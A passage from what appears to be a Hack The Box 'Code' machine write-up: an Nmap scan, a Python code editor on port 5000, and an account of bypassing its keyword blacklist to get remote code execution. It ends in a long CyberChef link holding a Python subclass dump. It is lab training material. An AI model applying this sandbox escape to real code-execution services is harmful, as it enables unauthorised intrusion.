Code

https://app.hackthebox.com/machines/Code

Port scan

Running initial fast Nmap scan on 10.129.33.86...
Open ports: 22,5000
Running detailed Nmap scan on ports: 22,5000...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 18:21 IST
Nmap scan report for 10.129.33.86 (10.129.33.86)
Host is up (0.40s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
|   256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_  256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open  http    Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds
Scan complete. Results saved in 10.129.33.86.ports.scan

There's a web page running on port 5000, the title suggests it's a python code editor. seems FUN.

Web attack (sandbox bypass?)

Homeage

It's a simple python code editor, let's try catching this in burp suite and get RCE.

After I captured the request, I changed the body encoding. I like using WebkitFormBoundary because it takes care of all the encoding stuff for me.

I try to read the curren file, but a simple payload doesn't work.

Hmm, that means the program has some bad characters/words blacklist & ignore executing the code if one of the words is included in the program.

LogoJinja2 SSTI - HackTricks

I followed the RCE section, and got a successfull RCE.

https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%3E,'%7D,'%5C%5Cn',true,false,true,false)Add_line_numbers(0)&input=PGNsYXNzICd0eXBlJz4sIDxjbGFzcyAnd2Vha3JlZic%2BLCA8Y2xhc3MgJ3dlYWtjYWxsYWJsZXByb3h5Jz4sIDxjbGFzcyAnd2Vha3Byb3h5Jz4sIDxjbGFzcyAnaW50Jz4sIDxjbGFzcyAnYnl0ZWFycmF5Jz4sIDxjbGFzcyAnYnl0ZXMnPiwgPGNsYXNzICdsaXN0Jz4sIDxjbGFzcyAnTm9uZVR5cGUnPiwgPGNsYXNzICdOb3RJbXBsZW1lbnRlZFR5cGUnPiwgPGNsYXNzICd0cmFjZWJhY2snPiwgPGNsYXNzICdzdXBlcic%2BLCA8Y2xhc3MgJ3JhbmdlJz4sIDxjbGFzcyAnZGljdCc%2BLCA8Y2xhc3MgJ2RpY3Rfa2V5cyc%2BLCA8Y2xhc3MgJ2RpY3RfdmFsdWVzJz4sIDxjbGFzcyAnZGljdF9pdGVtcyc%2BLCA8Y2xhc3MgJ2RpY3RfcmV2ZXJzZWtleWl0ZXJhdG9yJz4sIDxjbGFzcyAnZGljdF9yZXZlcnNldmFsdWVpdGVyYXRvcic%2BLCA8Y2xhc3MgJ2RpY3RfcmV2ZXJzZWl0ZW1pdGVyYXRvcic%2BLCA8Y2xhc3MgJ29kaWN0X2l0ZXJhdG9yJz4sIDxjbGFzcyAnc2V0Jz4sIDxjbGFzcyAnc3RyJz4sIDxjbGFzcyAnc2xpY2UnPiwgPGNsYXNzICdzdGF0aWNtZXRob2QnPiwgPGNsYXNzICdjb21wbGV4Jz4sIDxjbGFzcyAnZmxvYXQnPiwgPGNsYXNzICdmcm96ZW5zZXQnPiwgPGNsYXNzICdwcm9wZXJ0eSc%2BLCA8Y2xhc3MgJ21hbmFnZWRidWZmZXInPiwgPGNsYXNzICdtZW1vcnl2aWV3Jz4sIDxjbGFzcyAndHVwbGUnPiwgPGNsYXNzICdlbnVtZXJhdGUnPiwgPGNsYXNzICdyZXZlcnNlZCc%2BLCA8Y2xhc3MgJ3N0ZGVycnByaW50ZXInPiwgPGNsYXNzICdjb2RlJz4sIDxjbGFzcyAnZnJhbWUnPiwgPGNsYXNzICdidWlsdGluX2Z1bmN0aW9uX29yX21ldGhvZCc%2BLCA8Y2xhc3MgJ21ldGhvZCc%2BLCA8Y2xhc3MgJ2Z1bmN0aW9uJz4sIDxjbGFzcyAnbWFwcGluZ3Byb3h5Jz4sIDxjbGFzcyAnZ2VuZXJhdG9yJz4sIDxjbGFzcyAnZ2V0c2V0X2Rlc2NyaXB0b3InPiwgPGNsYXNzICd3cmFwcGVyX2Rlc2NyaXB0b3InPiwgPGNsYXNzICdtZXRob2Qtd3JhcHBlcic%2BLCA8Y2xhc3MgJ2VsbGlwc2lzJz4sIDxjbGFzcyAnbWVtYmVyX2Rlc2NyaXB0b3InPiwgPGNsYXNzICd0eXBlcy5TaW1wbGVOYW1lc3BhY2UnPiwgPGNsYXNzICdQeUNhcHN1bGUnPiwgPGNsYXNzICdsb25ncmFuZ2VfaXRlcmF0b3InPiwgPGNsYXNzICdjZWxsJz4sIDxjbGFzcyAnaW5zdGFuY2VtZXRob2QnPiwgPGNsYXNzICdjbGFzc21ldGhvZF9kZXNjcmlwdG9yJz4sIDxjbGFzcyAnbWV0aG9kX2Rlc2NyaXB0b3InPiwgPGNsYXNzICdjYWxsYWJsZV9pdGVyYXRvcic%2BLCA8Y2xhc3MgJ2l0ZXJhdG9yJz4sIDxjbGFzcyAncGlja2xlLlBpY2tsZUJ1ZmZlcic%2BLCA8Y2xhc3MgJ2Nvcm91dGluZSc%2BLCA8Y2xhc3MgJ2Nvcm91dGluZV93cmFwcGVyJz4sIDxjbGFzcyAnSW50ZXJwcmV0ZXJJRCc%2BLCA8Y2xhc3MgJ0VuY29kaW5nTWFwJz4sIDxjbGFzcyAnZmllbGRuYW1laXRlcmF0b3InPiwgPGNsYXNzICdmb3JtYXR0ZXJpdGVyYXRvcic%2BLCA8Y2xhc3MgJ0Jhc2VFeGNlcHRpb24nPiwgPGNsYXNzICdoYW10Jz4sIDxjbGFzcyAnaGFtdF9hcnJheV9ub2RlJz4sIDxjbGFzcyAnaGFtdF9iaXRtYXBfbm9kZSc%2BLCA8Y2xhc3MgJ2hhbXRfY29sbGlzaW9uX25vZGUnPiwgPGNsYXNzICdrZXlzJz4sIDxjbGFzcyAndmFsdWVzJz4sIDxjbGFzcyAnaXRlbXMnPiwgPGNsYXNzICdDb250ZXh0Jz4sIDxjbGFzcyAnQ29udGV4dFZhcic%2BLCA8Y2xhc3MgJ1Rva2VuJz4sIDxjbGFzcyAnVG9rZW4uTUlTU0lORyc%2BLCA8Y2xhc3MgJ21vZHVsZWRlZic%2BLCA8Y2xhc3MgJ21vZHVsZSc%2BLCA8Y2xhc3MgJ2ZpbHRlcic%2BLCA8Y2xhc3MgJ21hcCc%2BLCA8Y2xhc3MgJ3ppcCc%2BLCA8Y2xhc3MgJ19mcm96ZW5faW1wb3J0bGliLl9Nb2R1bGVMb2NrJz4sIDxjbGFzcyAnX2Zyb3plbl9pbXBvcnRsaWIuX0R1bW15TW9kdWxlTG9jayc%2BLCA8Y2xhc3MgJ19mcm96ZW5faW1wb3J0bGliLl9Nb2R1bGVMb2NrTWFuYWdlcic%2BLCA8Y2xhc3MgJ19mcm96ZW5faW1wb3J0bGliLk1vZHVsZVNwZWMnPiwgPGNsYXNzICdfZnJvemVuX2ltcG9ydGxpYi5CdWlsdGluSW1wb3J0ZXInPiwgPGNsYXNzICdjbGFzc21ldGhvZCc%2BLCA8Y2xhc3MgJ19mcm96ZW5faW1wb3J0bGliLkZyb3plbkltcG9ydGVyJz4sIDxjbGFzcyAnX2Zyb3plbl9pbXBvcnRsaWIuX0ltcG9ydExvY2tDb250ZXh0Jz4sIDxjbGFzcyAnX3RocmVhZC5fbG9jYWxkdW1teSc%2BLCA8Y2xhc3MgJ190aHJlYWQuX2xvY2FsJz4sIDxjbGFzcyAnX3RocmVhZC5sb2NrJz4sIDxjbGFzcyAnX3RocmVhZC5STG9jayc%2BLCA8Y2xhc3MgJ19pby5fSU9CYXNlJz4sIDxjbGFzcyAnX2lvLl9CeXRlc0lPQnVmZmVyJz4sIDxjbGFzcyAnX2lvLkluY3JlbWVudGFsTmV3bGluZURlY29kZXInPiwgPGNsYXNzICdwb3NpeC5TY2FuZGlySXRlcmF0b3InPiwgPGNsYXNzICdwb3NpeC5EaXJFbnRyeSc%2BLCA8Y2xhc3MgJ19mcm96ZW5faW1wb3J0bGliX2V4dGVybmFsLldpbmRvd3NSZWdpc3RyeUZpbmRlcic%2BLCA8Y2xhc3MgJ19mcm96ZW5faW1wb3J0bGliX2V4dGVybmFsLl9Mb2FkZXJCYXNpY3MnPiwgPGNsYXNzICdfZnJvemVuX2ltcG9ydGxpYl9leHRlcm5hbC5GaWxlTG9hZGVyJz4sIDxjbGFzcyAnX2Zyb3plbl9pbXBvcnRsaWJfZXh0ZXJuYWwuX05hbWVzcGFjZVBhdGgnPiwgPGNsYXNzICdfZnJvemVuX2ltcG9ydGxpYl9leHRlcm5hbC5fTmFtZXNwYWNlTG9hZGVyJz4sIDxjbGFzcyAnX2Zyb3plbl9pbXBvcnRsaWJfZXh0ZXJuYWwuUGF0aEZpbmRlcic%2BLCA8Y2xhc3MgJ19mcm96ZW5faW1wb3J0bGliX2V4dGVybmFsLkZpbGVGaW5kZXInPiwgPGNsYXNzICd6aXBpbXBvcnQuemlwaW1wb3J0ZXInPiwgPGNsYXNzICd6aXBpbXBvcnQuX1ppcEltcG9ydFJlc291cmNlUmVhZGVyJz4sIDxjbGFzcyAnY29kZWNzLkNvZGVjJz4sIDxjbGFzcyAnY29kZWNzLkluY3JlbWVudGFsRW5jb2Rlcic%2BLCA8Y2xhc3MgJ2NvZGVjcy5JbmNyZW1lbnRhbERlY29kZXInPiwgPGNsYXNzICdjb2RlY3MuU3RyZWFtUmVhZGVyV3JpdGVyJz4sIDxjbGFzcyAnY29kZWNzLlN0cmVhbVJlY29kZXInPiwgPGNsYXNzICdfYWJjX2RhdGEnPiwgPGNsYXNzICdhYmMuQUJDJz4sIDxjbGFzcyAnZGljdF9pdGVtaXRlcmF0b3InPiwgPGNsYXNzICdjb2xsZWN0aW9ucy5hYmMuSGFzaGFibGUnPiwgPGNsYXNzICdjb2xsZWN0aW9ucy5hYmMuQXdhaXRhYmxlJz4sIDxjbGFzcyAnY29sbGVjdGlvbnMuYWJjLkFzeW5jSXRlcmFibGUnPiwgPGNsYXNzICdhc3luY19nZW5lcmF0b3InPiwgPGNsYXNzICdjb2xsZWN0aW9ucy5hYmMuSXRlcmFibGUnPiwgPGNsYXNzICdieXRlc19pdGVyYXRvcic%2BLCA8Y2xhc3MgJ2J5dGVhcnJheV9pdGVyYXRvcic%2BLCA8Y2xhc3MgJ2RpY3Rfa2V5aXRlcmF0b3InPiwgPGNsYXNzICdkaWN0X3ZhbHVlaXRlcmF0b3InPiwgPGNsYXNzICdsaXN0X2l0ZXJhdG9yJz4sIDxjbGFzcyAnbGlzdF9yZXZlcnNlaXRlcmF0b3InPiwgPGNsYXNzICdyYW5nZV9pdGVyYXRvcic%2BLCA8Y2xhc3MgJ3NldF9pdGVyYXRvcic%2BLCA8Y2xhc3MgJ3N0cl9pdGVyYXRvcic%2BLCA8Y2xhc3MgJ3R1cGxlX2l0ZXJhdG9yJz4sIDxjbGFzcyAnY29sbGVjdGlvbnMuYWJjLlNpemVkJz4sIDxjbGFzcyAnY29sbGVjdGlvbnMuYWJjLkNvbnRhaW5lcic%2BLCA8Y2xhc3MgJ2NvbGxlY3Rpb25zLmFiYy5DYWxsYWJsZSc%2BLCA8Y2xhc3MgJ29zLl93cmFwX2Nsb3NlJz4sIDxjbGFzcyAnX3NpdGVidWlsdGlucy5RdWl0dGVyJz4sIDxjbGFzcyAnX3NpdGVidWlsdGlucy5fUHJpbnRlcic%2BLCA8Y2xhc3MgJ19zaXRlYnVpbHRpbnMuX0hlbHBlcic%2BLCA8Y2xhc3MgJ3R5cGVzLkR5bmFtaWNDbGFzc0F0dHJpYnV0ZSc%2BLCA8Y2xhc3MgJ3R5cGVzLl9HZW5lcmF0b3JXcmFwcGVyJz4sIDxjbGFzcyAnd2FybmluZ3MuV2FybmluZ01lc3NhZ2UnPiwgPGNsYXNzICd3YXJuaW5ncy5jYXRjaF93YXJuaW5ncyc%2BLCA8Y2xhc3MgJ2ltcG9ydGxpYi5hYmMuRmluZGVyJz4sIDxjbGFzcyAnaW1wb3J0bGliLmFiYy5Mb2FkZXInPiwgPGNsYXNzICdpbXBvcnRsaWIuYWJjLlJlc291cmNlUmVhZGVyJz4sIDxjbGFzcyAnb3BlcmF0b3IuaXRlbWdldHRlcic%2BLCA8Y2xhc3MgJ29wZXJhdG9yLmF0dHJnZXR0ZXInPiwgPGNsYXNzICdvcGVyYXRvci5tZXRob2RjYWxsZXInPiwgPGNsYXNzICdpdGVydG9vbHMuYWNjdW11bGF0ZSc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5jb21iaW5hdGlvbnMnPiwgPGNsYXNzICdpdGVydG9vbHMuY29tYmluYXRpb25zX3dpdGhfcmVwbGFjZW1lbnQnPiwgPGNsYXNzICdpdGVydG9vbHMuY3ljbGUnPiwgPGNsYXNzICdpdGVydG9vbHMuZHJvcHdoaWxlJz4sIDxjbGFzcyAnaXRlcnRvb2xzLnRha2V3aGlsZSc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5pc2xpY2UnPiwgPGNsYXNzICdpdGVydG9vbHMuc3Rhcm1hcCc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5jaGFpbic%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5jb21wcmVzcyc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5maWx0ZXJmYWxzZSc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5jb3VudCc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy56aXBfbG9uZ2VzdCc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5wZXJtdXRhdGlvbnMnPiwgPGNsYXNzICdpdGVydG9vbHMucHJvZHVjdCc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5yZXBlYXQnPiwgPGNsYXNzICdpdGVydG9vbHMuZ3JvdXBieSc%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5fZ3JvdXBlcic%2BLCA8Y2xhc3MgJ2l0ZXJ0b29scy5fdGVlJz4sIDxjbGFzcyAnaXRlcnRvb2xzLl90ZWVfZGF0YW9iamVjdCc%2BLCA8Y2xhc3MgJ3JlcHJsaWIuUmVwcic%2BLCA8Y2xhc3MgJ2NvbGxlY3Rpb25zLmRlcXVlJz4sIDxjbGFzcyAnX2NvbGxlY3Rpb25zLl9kZXF1ZV9pdGVyYXRvcic%2BLCA8Y2xhc3MgJ19jb2xsZWN0aW9ucy5fZGVxdWVfcmV2ZXJzZV9pdGVyYXRvcic%2BLCA8Y2xhc3MgJ19jb2xsZWN0aW9ucy5fdHVwbGVnZXR0ZXInPiwgPGNsYXNzICdjb2xsZWN0aW9ucy5fTGluayc%2BLCA8Y2xhc3MgJ2Z1bmN0b29scy5wYXJ0aWFsJz4sIDxjbGFzcyAnZnVuY3Rvb2xzLl9scnVfY2FjaGVfd3JhcHBlcic%2BLCA8Y2xhc3MgJ2Z1bmN0b29scy5wYXJ0aWFsbWV0aG9kJz4sIDxjbGFzcyAnZnVuY3Rvb2xzLnNpbmdsZWRpc3BhdGNobWV0aG9kJz4sIDxjbGFzcyAnZnVuY3Rvb2xzLmNhY2hlZF9wcm9wZXJ0eSc%2BLCA8Y2xhc3MgJ2NvbnRleHRsaWIuQ29udGV4dERlY29yYXRvcic%2BLCA8Y2xhc3MgJ2NvbnRleHRsaWIuX0dlbmVyYXRvckNvbnRleHRNYW5hZ2VyQmFzZSc%2BLCA8Y2xhc3MgJ2NvbnRleHRsaWIuX0Jhc2VFeGl0U3RhY2snPiwgPGNsYXNzICdlbnVtLmF1dG8nPiwgPGVudW0gJ0VudW0nPiwgPGNsYXNzICdyZS5QYXR0ZXJuJz4sIDxjbGFzcyAncmUuTWF0Y2gnPiwgPGNsYXNzICdfc3JlLlNSRV9TY2FubmVyJz4sIDxjbGFzcyAnc3JlX3BhcnNlLlN0YXRlJz4sIDxjbGFzcyAnc3JlX3BhcnNlLlN1YlBhdHRlcm4nPiwgPGNsYXNzICdzcmVfcGFyc2UuVG9rZW5pemVyJz4sIDxjbGFzcyAncmUuU2Nhbm5lcic%2BLCA8Y2xhc3MgJ19fZnV0dXJlX18uX0ZlYXR1cmUnPiwgPGNsYXNzICd6bGliLkNvbXByZXNzJz4sIDxjbGFzcyAnemxpYi5EZWNvbXByZXNzJz4sIDxjbGFzcyAnX3dlYWtyZWZzZXQuX0l0ZXJhdGlvbkd1YXJkJz4sIDxjbGFzcyAnX3dlYWtyZWZzZXQuV2Vha1NldCc%2BLCA8Y2xhc3MgJ3RocmVhZGluZy5fUkxvY2snPiwgPGNsYXNzICd0aHJlYWRpbmcuQ29uZGl0aW9uJz4sIDxjbGFzcyAndGhyZWFkaW5nLlNlbWFwaG9yZSc%2BLCA8Y2xhc3MgJ3RocmVhZGluZy5FdmVudCc%2BLCA8Y2xhc3MgJ3RocmVhZGluZy5CYXJyaWVyJz4sIDxjbGFzcyAndGhyZWFkaW5nLlRocmVhZCc%2BLCA8Y2xhc3MgJ19iejIuQloyQ29tcHJlc3Nvcic%2BLCA8Y2xhc3MgJ19iejIuQloyRGVjb21wcmVzc29yJz4sIDxjbGFzcyAnX2x6bWEuTFpNQUNvbXByZXNzb3InPiwgPGNsYXNzICdfbHptYS5MWk1BRGVjb21wcmVzc29yJz4sIDxjbGFzcyAnU3RydWN0Jz4sIDxjbGFzcyAndW5wYWNrX2l0ZXJhdG9yJz4sIDxjbGFzcyAnemlwZmlsZS5aaXBJbmZvJz4sIDxjbGFzcyAnemlwZmlsZS5MWk1BQ29tcHJlc3Nvcic%2BLCA8Y2xhc3MgJ3ppcGZpbGUuTFpNQURlY29tcHJlc3Nvcic%2BLCA8Y2xhc3MgJ3ppcGZpbGUuX1NoYXJlZEZpbGUnPiwgPGNsYXNzICd6aXBmaWxlLl9UZWxsYWJsZSc%2BLCA8Y2xhc3MgJ3ppcGZpbGUuWmlwRmlsZSc%2BLCA8Y2xhc3MgJ3ppcGZpbGUuUGF0aCc%2BLCA8Y2xhc3MgJ3dlYWtyZWYuZmluYWxpemUuX0luZm8nPiwgPGNsYXNzICd3ZWFrcmVmLmZpbmFsaXplJz4sIDxjbGFzcyAncGtndXRpbC5JbXBJbXBvcnRlcic%2BLCA8Y2xhc3MgJ3BrZ3V0aWwuSW1wTG9hZGVyJz4sIDxjbGFzcyAnZGF0ZXRpbWUuZGF0ZSc%2BLCA8Y2xhc3MgJ2RhdGV0aW1lLnRpbWVkZWx0YSc%2BLCA8Y2xhc3MgJ2RhdGV0aW1lLnRpbWUnPiwgPGNsYXNzICdkYXRldGltZS50emluZm8nPiwgPGNsYXNzICdweWV4cGF0LnhtbHBhcnNlcic%2BLCA8Y2xhc3MgJ3BsaXN0bGliLkRhdGEnPiwgPGNsYXNzICdwbGlzdGxpYi5VSUQnPiwgPGNsYXNzICdwbGlzdGxpYi5fUGxpc3RQYXJzZXInPiwgPGNsYXNzICdwbGlzdGxpYi5fRHVtYlhNTFdyaXRlcic%2BLCA8Y2xhc3MgJ3BsaXN0bGliLl9CaW5hcnlQbGlzdFBhcnNlcic%2BLCA8Y2xhc3MgJ3BsaXN0bGliLl9CaW5hcnlQbGlzdFdyaXRlcic%2BLCA8Y2xhc3MgJ3N0cmluZy5UZW1wbGF0ZSc%2BLCA8Y2xhc3MgJ3N0cmluZy5Gb3JtYXR0ZXInPiwgPGNsYXNzICdlbWFpbC5jaGFyc2V0LkNoYXJzZXQnPiwgPGNsYXNzICdlbWFpbC5oZWFkZXIuSGVhZGVyJz4sIDxjbGFzcyAnZW1haWwuaGVhZGVyLl9WYWx1ZUZvcm1hdHRlcic%2BLCA8Y2xhc3MgJ19zaGE1MTIuc2hhMzg0Jz4sIDxjbGFzcyAnX3NoYTUxMi5zaGE1MTInPiwgPGNsYXNzICdfcmFuZG9tLlJhbmRvbSc%2BLCA8Y2xhc3MgJ3NlbGVjdC5wb2xsJz4sIDxjbGFzcyAnc2VsZWN0LmVwb2xsJz4sIDxjbGFzcyAnc2VsZWN0b3JzLkJhc2VTZWxlY3Rvcic%2BLCA8Y2xhc3MgJ19zb2NrZXQuc29ja2V0Jz4sIDxjbGFzcyAnaXBhZGRyZXNzLl9JUEFkZHJlc3NCYXNlJz4sIDxjbGFzcyAnaXBhZGRyZXNzLl9CYXNlVjQnPiwgPGNsYXNzICdpcGFkZHJlc3MuX0lQdjRDb25zdGFudHMnPiwgPGNsYXNzICdpcGFkZHJlc3MuX0Jhc2VWNic%2BLCA8Y2xhc3MgJ2lwYWRkcmVzcy5fSVB2NkNvbnN0YW50cyc%2BLCA8Y2xhc3MgJ3VybGxpYi5wYXJzZS5fUmVzdWx0TWl4aW5TdHInPiwgPGNsYXNzICd1cmxsaWIucGFyc2UuX1Jlc3VsdE1peGluQnl0ZXMnPiwgPGNsYXNzICd1cmxsaWIucGFyc2UuX05ldGxvY1Jlc3VsdE1peGluQmFzZSc%2BLCA8Y2xhc3MgJ2NhbGVuZGFyLl9sb2NhbGl6ZWRfbW9udGgnPiwgPGNsYXNzICdjYWxlbmRhci5fbG9jYWxpemVkX2RheSc%2BLCA8Y2xhc3MgJ2NhbGVuZGFyLkNhbGVuZGFyJz4sIDxjbGFzcyAnY2FsZW5kYXIuZGlmZmVyZW50X2xvY2FsZSc%2BLCA8Y2xhc3MgJ2VtYWlsLl9wYXJzZWFkZHIuQWRkcmxpc3RDbGFzcyc%2BLCA8Y2xhc3MgJ2VtYWlsLl9wb2xpY3liYXNlLl9Qb2xpY3lCYXNlJz4sIDxjbGFzcyAnZW1haWwuZmVlZHBhcnNlci5CdWZmZXJlZFN1YkZpbGUnPiwgPGNsYXNzICdlbWFpbC5mZWVkcGFyc2VyLkZlZWRQYXJzZXInPiwgPGNsYXNzICdlbWFpbC5wYXJzZXIuUGFyc2VyJz4sIDxjbGFzcyAnZW1haWwucGFyc2VyLkJ5dGVzUGFyc2VyJz4sIDxjbGFzcyAndGVtcGZpbGUuX1JhbmRvbU5hbWVTZXF1ZW5jZSc%2BLCA8Y2xhc3MgJ3RlbXBmaWxlLl9UZW1wb3JhcnlGaWxlQ2xvc2VyJz4sIDxjbGFzcyAndGVtcGZpbGUuX1RlbXBvcmFyeUZpbGVXcmFwcGVyJz4sIDxjbGFzcyAndGVtcGZpbGUuU3Bvb2xlZFRlbXBvcmFyeUZpbGUnPiwgPGNsYXNzICd0ZW1wZmlsZS5UZW1wb3JhcnlEaXJlY3RvcnknPiwgPGNsYXNzICd0ZXh0d3JhcC5UZXh0V3JhcHBlcic%2BLCA8Y2xhc3MgJ2Rpcy5CeXRlY29kZSc%2BLCA8Y2xhc3MgJ3Rva2VuaXplLlVudG9rZW5pemVyJz4sIDxjbGFzcyAnaW5zcGVjdC5CbG9ja0ZpbmRlcic%2BLCA8Y2xhc3MgJ2luc3BlY3QuX3ZvaWQnPiwgPGNsYXNzICdpbnNwZWN0Ll9lbXB0eSc%2BLCA8Y2xhc3MgJ2luc3BlY3QuUGFyYW1ldGVyJz4sIDxjbGFzcyAnaW5zcGVjdC5Cb3VuZEFyZ3VtZW50cyc%2BLCA8Y2xhc3MgJ2luc3BlY3QuU2lnbmF0dXJlJz4sIDxjbGFzcyAncGtnX3Jlc291cmNlcy5leHRlcm4uVmVuZG9ySW1wb3J0ZXInPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLl92ZW5kb3Iuc2l4Ll9MYXp5RGVzY3InPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLl92ZW5kb3Iuc2l4Ll9TaXhNZXRhUGF0aEltcG9ydGVyJz4sIDxjbGFzcyAncGtnX3Jlc291cmNlcy5fdmVuZG9yLnNpeC5fTGF6eURlc2NyJz4sIDxjbGFzcyAncGtnX3Jlc291cmNlcy5fdmVuZG9yLnNpeC5fU2l4TWV0YVBhdGhJbXBvcnRlcic%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuX3ZlbmRvci5hcHBkaXJzLkFwcERpcnMnPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLmV4dGVybi5wYWNrYWdpbmcuX3N0cnVjdHVyZXMuSW5maW5pdHknPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLmV4dGVybi5wYWNrYWdpbmcuX3N0cnVjdHVyZXMuTmVnYXRpdmVJbmZpbml0eSc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuZXh0ZXJuLnBhY2thZ2luZy52ZXJzaW9uLl9CYXNlVmVyc2lvbic%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuZXh0ZXJuLnBhY2thZ2luZy5zcGVjaWZpZXJzLkJhc2VTcGVjaWZpZXInPiwgPGNsYXNzICdwcHJpbnQuX3NhZmVfa2V5Jz4sIDxjbGFzcyAncHByaW50LlByZXR0eVByaW50ZXInPiwgPGNsYXNzICd0cmFjZWJhY2suRnJhbWVTdW1tYXJ5Jz4sIDxjbGFzcyAndHJhY2ViYWNrLlRyYWNlYmFja0V4Y2VwdGlvbic%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuX3ZlbmRvci5weXBhcnNpbmcuX0NvbnN0YW50cyc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuX3ZlbmRvci5weXBhcnNpbmcuX1BhcnNlUmVzdWx0c1dpdGhPZmZzZXQnPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLl92ZW5kb3IucHlwYXJzaW5nLlBhcnNlUmVzdWx0cyc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuX3ZlbmRvci5weXBhcnNpbmcuUGFyc2VyRWxlbWVudC5fVW5ib3VuZGVkQ2FjaGUnPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLl92ZW5kb3IucHlwYXJzaW5nLlBhcnNlckVsZW1lbnQuX0ZpZm9DYWNoZSc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuX3ZlbmRvci5weXBhcnNpbmcuUGFyc2VyRWxlbWVudCc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuX3ZlbmRvci5weXBhcnNpbmcuX051bGxUb2tlbic%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuX3ZlbmRvci5weXBhcnNpbmcuT25seU9uY2UnPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLl92ZW5kb3IucHlwYXJzaW5nLnB5cGFyc2luZ19jb21tb24nPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLmV4dGVybi5wYWNrYWdpbmcubWFya2Vycy5Ob2RlJz4sIDxjbGFzcyAncGtnX3Jlc291cmNlcy5leHRlcm4ucGFja2FnaW5nLm1hcmtlcnMuTWFya2VyJz4sIDxjbGFzcyAncGtnX3Jlc291cmNlcy5leHRlcm4ucGFja2FnaW5nLnJlcXVpcmVtZW50cy5SZXF1aXJlbWVudCc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuSU1ldGFkYXRhUHJvdmlkZXInPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLldvcmtpbmdTZXQnPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLkVudmlyb25tZW50Jz4sIDxjbGFzcyAncGtnX3Jlc291cmNlcy5SZXNvdXJjZU1hbmFnZXInPiwgPGNsYXNzICdwa2dfcmVzb3VyY2VzLk51bGxQcm92aWRlcic%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuTm9EaXN0cyc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuRW50cnlQb2ludCc%2BLCA8Y2xhc3MgJ3BrZ19yZXNvdXJjZXMuRGlzdHJpYnV0aW9uJz4sIDxjbGFzcyAnX2FzdC5BU1QnPiwgPGNsYXNzICdhc3QuTm9kZVZpc2l0b3InPiwgPGNsYXNzICdDQXJnT2JqZWN0Jz4sIDxjbGFzcyAnX2N0eXBlcy5DVGh1bmtPYmplY3QnPiwgPGNsYXNzICdfY3R5cGVzLl9DRGF0YSc%2BLCA8Y2xhc3MgJ19jdHlwZXMuQ0ZpZWxkJz4sIDxjbGFzcyAnX2N0eXBlcy5EaWN0UmVtb3Zlcic%2BLCA8Y2xhc3MgJ19jdHlwZXMuU3RydWN0UGFyYW1fVHlwZSc%2BLCA8Y2xhc3MgJ2N0eXBlcy5DRExMJz4sIDxjbGFzcyAnY3R5cGVzLkxpYnJhcnlMb2FkZXInPiwgPGNsYXNzICdzdWJwcm9jZXNzLkNvbXBsZXRlZFByb2Nlc3MnPiwgPGNsYXNzICdzdWJwcm9jZXNzLlBvcGVuJz4sIDxjbGFzcyAnbG9nZ2luZy5Mb2dSZWNvcmQnPiwgPGNsYXNzICdsb2dnaW5nLlBlcmNlbnRTdHlsZSc%2BLCA8Y2xhc3MgJ2xvZ2dpbmcuRm9ybWF0dGVyJz4sIDxjbGFzcyAnbG9nZ2luZy5CdWZmZXJpbmdGb3JtYXR0ZXInPiwgPGNsYXNzICdsb2dnaW5nLkZpbHRlcic%2BLCA8Y2xhc3MgJ2xvZ2dpbmcuRmlsdGVyZXInPiwgPGNsYXNzICdsb2dnaW5nLlBsYWNlSG9sZGVyJz4sIDxjbGFzcyAnbG9nZ2luZy5NYW5hZ2VyJz4sIDxjbGFzcyAnbG9nZ2luZy5Mb2dnZXJBZGFwdGVyJz4sIDxjbGFzcyAnZ3VuaWNvcm4ucGlkZmlsZS5QaWRmaWxlJz4sIDxjbGFzcyAnZ3VuaWNvcm4uc29jay5CYXNlU29ja2V0Jz4sIDxjbGFzc